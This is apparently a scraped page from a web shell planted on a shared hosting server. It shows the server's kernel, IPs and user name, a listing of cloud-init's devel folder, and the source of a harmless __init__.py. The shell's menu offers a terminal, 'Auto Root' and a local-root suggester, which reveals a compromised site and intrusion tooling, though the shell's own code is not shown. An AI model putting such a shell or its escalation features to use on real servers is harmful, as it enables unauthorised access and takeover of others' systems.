Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
cloudinit /
cmd /
devel /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
663
B
-rw-r--r--
2019-12-18 16:14
__init__.pyc
1.05
KB
-rw-r--r--
2022-10-18 11:04
__init__.pyo
1.05
KB
-rw-r--r--
2022-10-18 11:04
logs.py
5.55
KB
-rw-r--r--
2019-12-18 16:14
logs.pyc
6.07
KB
-rw-r--r--
2022-10-18 11:04
logs.pyo
6.07
KB
-rw-r--r--
2022-10-18 11:04
net_convert.py
4.8
KB
-rw-r--r--
2019-12-18 16:14
net_convert.pyc
4.54
KB
-rw-r--r--
2022-10-18 11:04
net_convert.pyo
4.54
KB
-rw-r--r--
2022-10-18 11:04
parser.py
1.13
KB
-rw-r--r--
2019-12-18 16:14
parser.pyc
1.29
KB
-rw-r--r--
2022-10-18 11:04
parser.pyo
1.29
KB
-rw-r--r--
2022-10-18 11:04
render.py
3.28
KB
-rw-r--r--
2019-12-18 16:14
render.pyc
3.52
KB
-rw-r--r--
2022-10-18 11:04
render.pyo
3.52
KB
-rw-r--r--
2022-10-18 11:04
Save
Rename
# This file is part of cloud-init. See LICENSE file for license information. """Common cloud-init devel commandline utility functions.""" import logging from cloudinit import log from cloudinit.stages import Init def addLogHandlerCLI(logger, log_level): """Add a commandline logging handler to emit messages to stderr.""" formatter = logging.Formatter('%(levelname)s: %(message)s') log.setupBasicLogging(log_level, formatter=formatter) return logger def read_cfg_paths(): """Return a Paths object based on the system configuration on disk.""" init = Init(ds_deps=[]) init.read_cfg() return init.paths # vi: ts=4 expandtab